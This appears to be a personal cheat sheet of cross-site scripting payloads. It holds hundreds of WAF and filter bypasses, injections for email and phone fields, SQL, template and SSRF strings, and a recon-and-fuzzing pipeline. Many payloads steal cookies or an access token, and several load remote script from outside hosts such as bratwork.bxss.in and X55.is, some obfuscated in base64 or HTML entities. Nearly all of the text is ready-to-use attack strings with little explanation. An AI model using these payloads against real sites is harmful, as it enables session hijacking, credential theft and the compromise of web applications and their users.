xss 1

javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie

1. bypass block of single quote '?url=home%26apos;-alert(1)//onclick="location='/home'-alert(1)//'"

2. bypass block of colon :?url=javascript%26colon;alert(1)href="javascript:alert(1)”

</base</sTyle/</scRIpt/</textArea/</noScript/</tiTle/-->＜h1/

<image/onerror="import('data:application/javascript;charset=utf-8;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKTtjb25zb2xlLmxvZyhkb2N1bWVudC5kb21haW4pOy8v')//%27"src>

#"></div><a href= javascript:alert(document.domain)

/?url=http://me6.com/aem/xss2.svg

/;/;/resource/md/get/url?url=http://oast.pro

\u003e\u003cimg src=1

<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>

onerror=alert(9)\u003e

AutoFocus/>/OnFocus=top?."ale"+"rt"/

<s\Cr\ipt\>alert(document\.cookie)<\/s\Cr\ipt\>\;\/>

<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>

❌<details/open=/Open/href=/data=+ontoggle="(alert)(document.domain)

automated xss <img/src="x"/onerror=prompt()>

' OR 1=1 ​

login email

["');alert('XSS');//"]@xyz.xxx

test@gmail.com%27%22%3E%3Csvg/onload=alert(/xss/)%3E

12345-abc-1-23456<script>alert(document.cookie)<%2Fscript>.img

phone no field xss

XSs - +441134960000;phone-context=alert(0)

Parameter pollution (1) - +441134960000;phone-context=&phone-context=+442..

Parameter pollution (2) - +441134960000;ext=1;ext=?

SQL injection +441134960000;phone-context=' OR 1=1; --

Template injection +441134960000;phone-context={{22}}[ [33]]{{77}}{77}{7*’7}

SSRF +441134960000;phone-context=http://burocoaborator.net

waybackurls http://testphp.vulnweb.com | urldedupe -qs | bhedak '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" | egrep -v 'Not'

amass enum -d hackerone.com -o hackerone.txt # Recon all subdomains. 
xargs -a allsub.txt -I@ sh -c 'python3 ~/ParamSpider/paramspider.py -d @ -l high' # Do Parameter fuzzing. 
cat *.txt > allsub.txt # Combine fuzzed parameter files in to one main file.  
cat allsub.txt | Gxss -p xss | dalfox pipe --mining-dict-word ~/root/Arjun/arjun/db/params.txt --skip-bav # Run this and wait for Dalfox to trigger XSS.

--'`"><img src=x>kdskf${{7*7}}
{onerror=eval}throw/0/+name
<a href='javascript:alert(document.domain);'>Click Me</a>

javascript:eval('var a=document.createElement('script');a.src='https://bratwork.bxss.in';document.body.appendChild(a)')
"><script src=https://bratwork.bxss.in></script>
"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYnJhdHdvcmsuYnhzcy5pbiI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs&#61;&#61; autofocus>
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYnJhdHdvcmsuYnhzcy5pbiI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs&#61;&#61 onerror=eval(atob(this.id))>
"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYnJhdHdvcmsuYnhzcy5pbiI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs&#61;&#61;>
"><iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#118;&#97;&#114;&#32;&#97;&#61;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#114;&#101;&#97;&#116;&#101;&#69;&#108;&#101;&#109;&#101;&#110;&#116;&#40;&#34;&#115;&#99;&#114;&#105;&#112;&#116;&#34;&#41;&#59;&#97;&#46;&#115;&#114;&#99;&#61;&#34;&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;bratwork.bxss.in&#34;&#59;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#98;&#111;&#100;&#121;&#46;&#97;&#112;&#112;&#101;&#110;&#100;&#67;&#104;&#105;&#108;&#100;&#40;&#97;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//bratwork.bxss.in");a.send();</script>
<script>$.getScript("//bratwork.bxss.in")</script>
xyz"/ng-click="constructor.constructor('alert(1)')()

<svg onload=alert(1)>
"><svg onload=alert(1)>
</tag><svg onload=alert(1)>
"></tag><svg onload=alert(1)>
"onmouseover=alert(1) //
"autofocus onfocus=alert(1) //
'-alert(1)-'
'/alert(1)//
\'/alert(1)//
</script><svg onload=alert(1)>
'}alert(1);{'
'}alert(1)%0A{'
\'}alert(1);{//
/alert(1)//\
/alert(1)}//\
${alert(1)}
'onload=alert(1)><svg/1='
'>alert(1)</script><script/1=' 
*/alert(1)</script><script>/*
*/alert(1)">'onload="/*<svg/1=' 
`-alert(1)">'onload="`<svg/1='
*/</script>'>alert(1)/*<script/1='
p=<svg/1='&q='onload=alert(1)>
p=<svg 1='&q='onload='/*&r=*/alert(1)'>
q=<script/&q=/src=data:&q=alert(1)>
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>
<img src=1 onerror=alert(1)>
<iframe src=javascript:alert(1)>
<details open ontoggle=alert(1)>
<svg><svg onload=alert(1)>
data:text/html,<img src=1 onerror=alert(1)>
data:text/html,<iframe src=javascript:alert(1)>
[clickme](javascript:alert`1`)
<script src=data:,alert(1)>
<script src=//brutelogic.com.br/1.js>
<iframe src=TARGET_URL onload="frames[0].postMessage('INJECTION','*')">
{{$new.constructor('alert(1)')()}}
<x ng-app>{{$new.constructor('alert(1)')()}}
<<!--%23set var="x" value="svg onload=alert(1)"--><!--%23echo var="x"-->>
(alert)(1)
a=alert,a(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top['al\145rt'](1)
top[8680439..toString(30)](1)
[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']
('\141\154\145\162\164\50\61\51')()
write`XSSed!`
write`<img/src/o&#78error=alert&lpar;1)&gt;`
write('\74img/src/o\156error\75alert\501\51\76')
top.open`javas\cript:al\ert\x281\x29`
top.open`javas\cript:al\ert\x281\x29${0}0`
${alert(1)}<svg onload=eval('`//'+URL)>
"o<x>nmouseover=alert<x>(1)//
 "autof<x>ocus o<x>nfocus=alert<x>(1)//
<script src=//www.google.com/complete/search?client=chrome%26jsonp=alert(1)>
</script>
<script src=//www.googleapis.com/customsearch/v1?callback=alert(1)></script>
<script src=//ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.min.js>
</script><x ng-app ng-csp>{{$new.constructor('alert(1)')()}}
<svg><a><rect width=99% height=99% /><animate attributeName=href 
to=javascript:alert(1)>
<svg><a><rect width=99% height=99% /><animate attributeName=href 
values=javascript:alert(1)>
<svg><a><rect width=99% height=99% /><animate attributeName=href to=0 
from=javascript:alert(1)>
<svg><use xlink:href=data:image/svg
%2Bxml;base64,PHN2ZyBpZD0ieCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAv
c3ZnIiB4bWxuczp4bGluaz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluayI
%2BPGVtYmVkIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIiBzcmM9Imp
hdmFzY3JpcHQ6YWxlcnQoMSkiLz48L3N2Zz4=%23x>
<script>alert(1)</script> 
<script src=data:,alert(1)> 
<iframe src=javascript:alert(1)> 
<embed src=javascript:alert(1)> 
<a href=javascript:alert(1)>click 
<math><brute href=javascript:alert(1)>click 
<form action=javascript:alert(1)><input type=submit> 
<isindex action=javascript:alert(1) type=submit value=click> 
<form><button formaction=javascript:alert(1)>click 
<form><input formaction=javascript:alert(1) type=submit value=click> 
<form><input formaction=javascript:alert(1) type=image value=click> 
<form><input formaction=javascript:alert(1) type=image src=SOURCE> 
<isindex formaction=javascript:alert(1) type=submit value=click> 
<object data=javascript:alert(1)> 
<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;> 
<svg><script xlink:href=data:,alert(1) /> 
<math><brute xlink:href=javascript:alert(1)>click
<x oncopy=alert(1)>copy this! 
<x oncontextmenu=alert(1)>right click this! 
<x onauxclick=alert(1)>right click this!
<x oncut=alert(1)>copy this! 
<x ondblclick=alert(1)>double click this! 
<x ondrag=alert(1)>drag this! 
<x contenteditable onfocus=alert(1)>focus this! 
<x contenteditable oninput=alert(1)>input here! 
<x contenteditable onkeydown=alert(1)>press any key! 
<x contenteditable onkeypress=alert(1)>press any key! 
<x contenteditable onkeyup=alert(1)>press any key! 
<x onmousedown=alert(1)>click this! 
<x onmouseenter=alert(1)>hover this
<x onmousemove=alert(1)>hover this! 
<x onmouseout=alert(1)>hover this! 
<x onmouseover=alert(1)>hover this! 
<x onmouseup=alert(1)>click this! 
<x contenteditable onpaste=alert(1)>paste here!
<x onpointercancel=alert(1)>hover this!
<x onpointerdown=alert(1)>hover this!
<x onpointerenter=alert(1)>hover this!
<x onpointerleave=alert(1)>hover this!
<x onpointermove=alert(1)>hover this!
<x onpointerout=alert(1)>hover this!
<x onpointerover=alert(1)>hover this!
<x onpointerup=alert(1)>hover this!
<x onpointerrawupdate=alert(1)>hover this!
">'-alert(1)-'<svg>
">&#39-alert(1)-&#39<svg>
">alert(1)-"<svg>
"&#34>alert(1)-&#34<svg>
<svg/on<script><script>load=alert(1)//</script>
%u003Csvg onload=alert(1)>
%u3008svg onload=alert(2)> 
%uFF1Csvg onload=alert(3)>
"><svg/onload=alert(1)>"@x.y
javascript://%250Aalert(1)
<x onanimationend=alert(1)><style>x{animation:s}@keyframes s{}
<x onanimationstart=alert(1)><style>x{animation:s}@keyframes s{}
<x onwebkitanimationend=alert(1)><style>x{animation:s}@keyframes s{}
<x onwebkitanimationstart=alert(1)><style>x{animation:s}@keyframes s{}
<x ontransitionend=alert(1)><style>*{transition:color 1s}*:hover{color:red}
<x ontransitionrun=alert(1)><style>*{transition:color 1s}*:hover{color:red}
<x ontransitionstart=alert(1)><style>*{transition:color 1s}*:hover{color:red}
<x ontransitioncancel=alert(1)><style>*{transition:color 1s}*:hover{color:red
<a autofocus onfocus=alert(1) href></a>
<a autofocus onfocusin=alert(1) href></a>
<a contenteditable onbeforeinput=alert(1)>test
<a draggable="true" ondrag="alert(1)" style=display:block>test</a>
<a draggable="true" ondragend="alert(1)" style=display:block>test</a>
<a draggable="true" ondragenter="alert(1)" style=display:block>test</a>
<a draggable="true" ondragleave="alert(1)" style=display:block>test</a>
<a draggable="true" ondragstart="alert(1)" style=display:block>test</a>
<a id=x style="transition:outline 1s" ontransitionend=alert(1) tabindex=1></a>
<a id=x tabindex=1 onfocus=alert(1)></a>
<a id=x tabindex=1 onfocusin=alert(1)></a>
<a onbeforecopy="alert(1)" contenteditable>test</a>
<a onbeforecut="alert(1)" contenteditable>test</a>
<div draggable="true" contenteditable>drag me</div><br ondragover=alert(1) contenteditable style=display:block>drop here</br>
<div draggable="true" contenteditable>drag me</div><br ondrop=alert(1) contenteditable style=display:block>drop here</br>
<div draggable="true" contenteditable>drag me</div><button ondragover=alert(1) contenteditable style=display:block>drop here</button>
<div draggable="true" contenteditable>drag me</div><button ondrop=alert(1) contenteditable style=display:block>drop here</button>
<div draggable="true" contenteditable>drag me</div><canvas ondragover=alert(1) contenteditable style=display:block>drop here</canvas>
<div draggable="true" contenteditable>drag me</div><canvas ondrop=alert(1) contenteditable style=display:block>drop here</canvas>
<div draggable="true" contenteditable>drag me</div><caption ondragover=alert(1) contenteditable style=display:block>drop here</caption>
<div draggable="true" contenteditable>drag me</div><caption ondrop=alert(1) contenteditable style=display:block>drop here</caption>
<div draggable="true" contenteditable>drag me</div><center ondragover=alert(1) contenteditable style=display:block>drop here</center>
<div draggable="true" contenteditable>drag me</div><center ondrop=alert(1) contenteditable style=display:block>drop here</center>
<div draggable="true" contenteditable>drag me</div><cite ondragover=alert(1) contenteditable style=display:block>drop here</cite>
<div draggable="true" contenteditable>drag me</div><cite ondrop=alert(1) contenteditable style=display:block>drop here</cite>
<div draggable="true" contenteditable>drag me</div><code ondragover=alert(1) contenteditable style=display:block>drop here</code>
<div draggable="true" contenteditable>drag me</div><code ondrop=alert(1) contenteditable style=display:block>drop here</code>
<div draggable="true" contenteditable>drag me</div><col ondragover=alert(1) contenteditable style=display:block>drop here</col>
<div draggable="true" contenteditable>drag me</div><col ondrop=alert(1) contenteditable style=display:block>drop here</col>
<div draggable="true" contenteditable>drag me</div><colgroup ondragover=alert(1) contenteditable style=display:block>drop here</colgroup>
<div draggable="true" contenteditable>drag me</div><colgroup ondrop=alert(1) contenteditable style=display:block>drop here</colgroup>
<div draggable="true" contenteditable>drag me</div><command ondragover=alert(1) contenteditable style=display:block>drop here</command>
<div draggable="true" contenteditable>drag me</div><command ondrop=alert(1) contenteditable style=display:block>drop here</command>
<div draggable="true" contenteditable>drag me</div><content ondragover=alert(1) contenteditable style=display:block>drop here</content>
<div draggable="true" contenteditable>drag me</div><content ondrop=alert(1) contenteditable style=display:block>drop here</content>
<div draggable="true" contenteditable>drag me</div><custom tags ondragover=alert(1) contenteditable style=display:block>drop here</custom tags>
<div draggable="true" contenteditable>drag me</div><custom tags ondrop=alert(1) contenteditable style=display:block>drop here</custom tags>
<div draggable="true" contenteditable>drag me</div><data ondragover=alert(1) contenteditable style=display:block>drop here</data>
<div draggable="true" contenteditable>drag me</div><data ondrop=alert(1) contenteditable style=display:block>drop here</data>
<div draggable="true" contenteditable>drag me</div><datalist ondragover=alert(1) contenteditable style=display:block>drop here</datalist>
<div draggable="true" contenteditable>drag me</div><datalist ondrop=alert(1) contenteditable style=display:block>drop here</datalist>
<div draggable="true" contenteditable>drag me</div><dd ondragover=alert(1) contenteditable style=display:block>drop here</dd>
<div draggable="true" contenteditable>drag me</div><dd ondrop=alert(1) contenteditable style=display:block>drop here</dd>
<div draggable="true" contenteditable>drag me</div><del ondragover=alert(1) contenteditable style=display:block>drop here</del>
<div draggable="true" contenteditable>drag me</div><del ondrop=alert(1) contenteditable style=display:block>drop here</del>
<div draggable="true" contenteditable>drag me</div><details ondragover=alert(1) contenteditable style=display:block>drop here</details>
<div draggable="true" contenteditable>drag me</div><details ondrop=alert(1) contenteditable style=display:block>drop here</details>
<div draggable="true" contenteditable>drag me</div><dfn ondragover=alert(1) contenteditable style=display:block>drop here</dfn>
<div draggable="true" contenteditable>drag me</div><dfn ondrop=alert(1) contenteditable style=display:block>drop here</dfn>
<div draggable="true" contenteditable>drag me</div><dialog ondragover=alert(1) contenteditable style=display:block>drop here</dialog>
<div draggable="true" contenteditable>drag me</div><dialog ondrop=alert(1) contenteditable style=display:block>drop here</dialog>
<div draggable="true" contenteditable>drag me</div><dir ondragover=alert(1) contenteditable style=display:block>drop here</dir>
<div draggable="true" contenteditable>drag me</div><dir ondrop=alert(1) contenteditable style=display:block>drop here</dir>
<div draggable="true" contenteditable>drag me</div><div ondragover=alert(1) contenteditable style=display:block>drop here</div>
<div draggable="true" contenteditable>drag me</div><div ondrop=alert(1) contenteditable style=display:block>drop here</div>
<div draggable="true" contenteditable>drag me</div><dl ondragover=alert(1) contenteditable style=display:block>drop here</dl>
<div draggable="true" contenteditable>drag me</div><dl ondrop=alert(1) contenteditable style=display:block>drop here</dl>
<div draggable="true" contenteditable>drag me</div><dt ondragover=alert(1) contenteditable style=display:block>drop here</dt>
<div draggable="true" contenteditable>drag me</div><dt ondrop=alert(1) contenteditable style=display:block>drop here</dt>
<div draggable="true" contenteditable>drag me</div><element ondragover=alert(1) contenteditable style=display:block>drop here</element>
<div draggable="true" contenteditable>drag me</div><element ondrop=alert(1) contenteditable style=display:block>drop here</element>
<div draggable="true" contenteditable>drag me</div><em ondragover=alert(1) contenteditable style=display:block>drop here</em>
<div draggable="true" contenteditable>drag me</div><em ondrop=alert(1) contenteditable style=display:block>drop here</em>
<div draggable="true" contenteditable>drag me</div><embed ondragover=alert(1) contenteditable style=display:block>drop here</embed>
<div draggable="true" contenteditable>drag me</div><embed ondrop=alert(1) contenteditable style=display:block>drop here</embed>
<div draggable="true" contenteditable>drag me</div><fieldset ondragover=alert(1) contenteditable style=display:block>drop here</fieldset>
<div draggable="true" contenteditable>drag me</div><fieldset ondrop=alert(1) contenteditable style=display:block>drop here</fieldset>
<div draggable="true" contenteditable>drag me</div><figcaption ondragover=alert(1) contenteditable style=display:block>drop here</figcaption>
<div draggable="true" contenteditable>drag me</div><figcaption ondrop=alert(1) contenteditable style=display:block>drop here</figcaption>
<div draggable="true" contenteditable>drag me</div><figure ondragover=alert(1) contenteditable style=display:block>drop here</figure>
<div draggable="true" contenteditable>drag me</div><figure ondrop=alert(1) contenteditable style=display:block>drop here</figure>
<div draggable="true" contenteditable>drag me</div><font ondragover=alert(1) contenteditable style=display:block>drop here</font>
<div draggable="true" contenteditable>drag me</div><font ondrop=alert(1) contenteditable style=display:block>drop here</font>
<div draggable="true" contenteditable>drag me</div><footer ondragover=alert(1) contenteditable style=display:block>drop here</footer>
<div draggable="true" contenteditable>drag me</div><footer ondrop=alert(1) contenteditable style=display:block>drop here</footer>
<div draggable="true" contenteditable>drag me</div><form ondragover=alert(1) contenteditable style=display:block>drop here</form>
<div draggable="true" contenteditable>drag me</div><form ondrop=alert(1) contenteditable style=display:block>drop here</form>
<div draggable="true" contenteditable>drag me</div><frame ondragover=alert(1) contenteditable style=display:block>drop here</frame>
<div draggable="true" contenteditable>drag me</div><frame ondrop=alert(1) contenteditable style=display:block>drop here</frame>
<div draggable="true" contenteditable>drag me</div><frameset ondragover=alert(1) contenteditable style=display:block>drop here</frameset>
<div draggable="true" contenteditable>drag me</div><frameset ondrop=alert(1) contenteditable style=display:block>drop here</frameset>
<div draggable="true" contenteditable>drag me</div><h1 ondragover=alert(1) contenteditable style=display:block>drop here</h1>
<div draggable="true" contenteditable>drag me</div><h1 ondrop=alert(1) contenteditable style=display:block>drop here</h1>
<div draggable="true" contenteditable>drag me</div><head ondragover=alert(1) contenteditable style=display:block>drop here</head>
<div draggable="true" contenteditable>drag me</div><head ondrop=alert(1) contenteditable style=display:block>drop here</head>
<div draggable="true" contenteditable>drag me</div><header ondragover=alert(1) contenteditable style=display:block>drop here</header>
<div draggable="true" contenteditable>drag me</div><header ondrop=alert(1) contenteditable style=display:block>drop here</header>
<div draggable="true" contenteditable>drag me</div><hgroup ondragover=alert(1) contenteditable style=display:block>drop here</hgroup>
<div draggable="true" contenteditable>drag me</div><hgroup ondrop=alert(1) contenteditable style=display:block>drop here</hgroup>
<div draggable="true" contenteditable>drag me</div><hr ondragover=alert(1) contenteditable s

Twitter famous

- [alert][0].call(this,1)

yd644%22onmouseover%3D%22confirm(11)%22style%3D%22position%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Btop%3A0%3Bleft%3A0%3B%22t81rgr8p6kr

xss%27);}}});alert(document.cookie);$(function+a(){a();});$(function+a(){if(a){}else+if(a){/*///

Mega7%3EXSS%3CIMG/SRC=https://www.notebookcheck.net/fileadmin/Notebooks/News/_nc3/hacker21.jp

<noscript> &amp;lt;p  title=” &lt;/noscript&gt;
&lt;style onload= alert(document.domain)//&quot;&gt; *{/*all*/color/*all*/:/*all*/#f78fb3/*all*/;} &lt;/style&gt;

<noscript> <p title=” </noscript>
<style onload= alert(document.domain)//”> *{/*all*/color/*all*/:/*all*/#f78fb3/*all*/;} </style>

JavaScript://%250Aalert?.(1)//
'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!-->
</Title/</Style/</Script/</textArea/</iFrame/</noScript>
\74k<K/contentEditable/autoFocus/OnFocus=
/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->

<a href="javascript&colon;alert&lpar;document&period;domain&rpar;">Click Here</a>

<a href="https://www.domain.tld/m7arm4n" contenteditable onbeforeinput="[origin].map(top['ale'+'rt'])" >here</a>

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onMouSeoVer=alert(1) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(100)//>\x3e

"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F

%3Cmarquee%3E%3C%2Fbr%3E%3C%2Fbr%3E%27%22%3E%22%3E%3Ciframe%3E%3Cimg%2Fsrc%2Fonerror%3Dalert%28document.domain%29%3E

*/alert()</script><script>/*

<a href="javas%09cript:[1].map(top['ale'+'rt'])">

~~?XSS=<a%20href="javas%09cript:[1].map(top[%27ale%27%2B%27rt%27])">~~

2 reflections, 2 inputs:
p1 = <svg/1='
p2 = 'onload=alert()>

<svg onload=eval(location.hash.slice(1))>
#with(document)body.appendChild(createElement('script')).src='//domain'

1. Replacing alert(1):
'-import('//X55.is')-'
<Svg OnLoad=import('//X55.is')>

2. As href or src attributes:
<Base Href=//X55.is>
<Script Src=//X55.is>

"><img src onerror=alert(1)>
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
javascript:alert(1)

=> use in uploads or regular input.

XSS (no image)
https://brutelogic.com.br/poc.svg

XSS (valid image)
https://brutelogic.com.br/brute.svg

Redirect (default)
https://brutelogic.com.br/redir.svg

Redirect (custom)
https://brutelogic.com.br/redir.svg?url=//X55.is

Redirect (custom + warning)
https://brutelogic.com.br/redir.svg?url=//X55.is&w=1

d=document,b='`',d['loca'+'tion']='javascript&colon;aler'+'t'+b+domain+b

data:text/html,<form action=https://brutelogic.com.br/xss-waf.php method=post><input type=hidden name=a value="<K Contenteditable Autofocus OnFocusIn=[1].map(alert)>"><input type=submit value=XSS></form>

<a href=//X55.is autofocus onfocus=import(href)>
https://brutelogic.com.br/gym.php?p05=%3Ca+href=//X55.is+autofocus+onfocus=import(href)%3E

<a href=javascript:'\74svg/onload\75alert\501\51\76'>
https://brutelogic.com.br/gym.php?p05=%3Ca+href=javascript:%27%5C74svg/onload%5C75alert%5C501%5C51%5C76%27%3Eclick
javascript:alert(1)
👇
javascript:%61lert(1)
👇
javascript:&#37&#54&#49lert(1)
👇
javascript:%26%2337%26%2354%26%2349lert(1)

<a href="javas%09cript:[1].map(top['ale'+'rt'])">

<a href="javas%09cript:[document['dom'+'ain']].map(top['ale'+'rt'])">

<py-script>
print('\74img/src/onerror\75alert(1)\76')
</py-script>

<a href="javas%09cript:[1].map(top['ale'+'rt'])">
<Tag OnEvent="alert/*>*/(1)"

<Svg OnLoad=confirm(1)>
%C0%BCSvg%C0%A0OnLoad%C0%BDconfirm%C0%A81%C0%A9%C0%BE

<Svg OnLoad=import('//X55.is')>
%C0%BCSvg%C0%A0OnLoad%C0%BDimport%C0%A8%C0%A7%C0%AF%C0%http://AFX55.is%C0%A7%C0%A9%C0%BE

JavaScript%26%2358confirm(1)
JavaScript%26%2358AB:confirm(1)
JavaScript%26%2358%0Bconfirm(1)
JavaScript%26%2358top?confirm(1):0

(jQuery present)
JavaScript%26%2358$;confirm(1)
JavaScript%26%2358$?confirm(1):0

<Svg Only=1 OnLoad=confirm(1)>

1. Replacing alert(1):
'-import('//X55.is')-'
<Svg OnLoad=import('//X55.is')>

2. As href or src attributes:
<Base Href=//X55.is>
<Script Src=//X55.is>

<a href="/*">*/)});
function+__MobileAppList(){alert(1)}//
1\47\42\55\55\41

1\'/[location=`Javas\x63ript:\x63onfirm\x60K\x60`]//

<Svg%K9OnLoad=%7Krompt%6K1%6K>

"<!--><Html%2FOnPointerEnter=%26%2397%26%23108%26%23101%26%23114%26%23116%26%2396K%26%2396<!--

JavaScript://%250Dtop.confirm(1)//?1

<script>alert(1)//
<script>alert(1)<!--
<script>alert(1)%0A-->
<script src=data:,alert(1)>
<script src=//HOST/FILE>
<script src=https:DOMAIN/FILE>
<svg><script xlink:href=//HOST/FILE>
<svg><script xlink:href=https:DOMAIN/FILE>

Wordfence 7.4.2
<a href=&#01javascript:alert(1)>

Sucuri CloudProxy (POST only)
<a href=javascript&colon;confirm(1)>

ModSecurity CRS 3.2.0 PL1
<a href="jav%0Dascript&colon;alert(1)">

<script>alert(localStorage.getItem(‘ServiceProvider.*****.username@company.com.accessToken’))</script>
<h1 class="xxx" onmouseover=alert(document.domain)>Shop Now</h1>.

<!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27>
<video poster=javascript:alert(1)//></video>

<%fscripT><script>confirm(document.domain)<%2fscripT>

javascript:{ alert`0` }
1'"><img/src/onerror=.1|alert``>

%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E

"></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>

HackerOne report to find xss

%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E http://host/path/to/image'onerror=alert(1);//.png

c panel

http://example.com/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa
http://example.com:2082/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa
http://example.com:2086/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa
http://example.com:2082/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa